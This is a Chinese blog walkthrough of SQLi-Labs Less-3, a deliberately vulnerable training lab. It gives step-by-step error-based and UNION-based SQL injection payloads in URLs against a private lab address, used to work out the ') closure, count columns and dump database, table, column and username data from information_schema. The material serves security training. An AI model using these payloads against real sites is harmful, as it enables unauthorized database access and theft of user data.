【SQLI-Lab】-Less3

本文介绍了GET单引号变形字符型注入(Errorbased-Singlequoteswithtwiststring)的概念,详细阐述了利用错误回显进行类型判断、闭合字符探索、数据库信息获取等步骤,包括判断列数、爆库名、表名、列名及数据值的过程,强调了字符型注入中符号闭合的重要性。
摘要由CSDN通过智能技术生成

Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

前言

一、GET字符型注入

执行数据库查询,并在回显点展示。
用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。

二、步骤

通过报错判断类型和闭合

http://192.168.135.149/sqli/Less-3/?id=1'

在这里插入图片描述

查看为字符型,进一步查看回显

http://192.168.135.149/sqli/Less-3/?id=1') and 1=1 -- 1

在这里插入图片描述

发现存在注入点

http://192.168.135.149/sqli/Less-3/?id=1') and 1=2 -- 1

在这里插入图片描述

判断列数

http://192.168.135.149/sqli/Less-3/?id=1') group by 3 -- 1

爆库名payload

http://192.168.135.149/sqli/Less-3/?id=-1') union select 1,database(),3 -- 1

在这里插入图片描述

爆表名payload

http://192.168.135.149/sqli/Less-3/?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),3 -- 1

在这里插入图片描述

爆列名payload

http://192.168.135.149/sqli/Less-3/?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_name="users"),3 --+

在这里插入图片描述

爆username列的数据值payload

http://192.168.135.149/sqli/Less-3/?id=-1') union select 1,(select group_concat(`username`) from security.users),3 -- 1

在这里插入图片描述

总结

字符型注意符号闭合,故意报错看是否多字符,即可明确字符型,符号闭合种类大致有’,’’,),’’),"),’’),"")等,多尝试即可成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值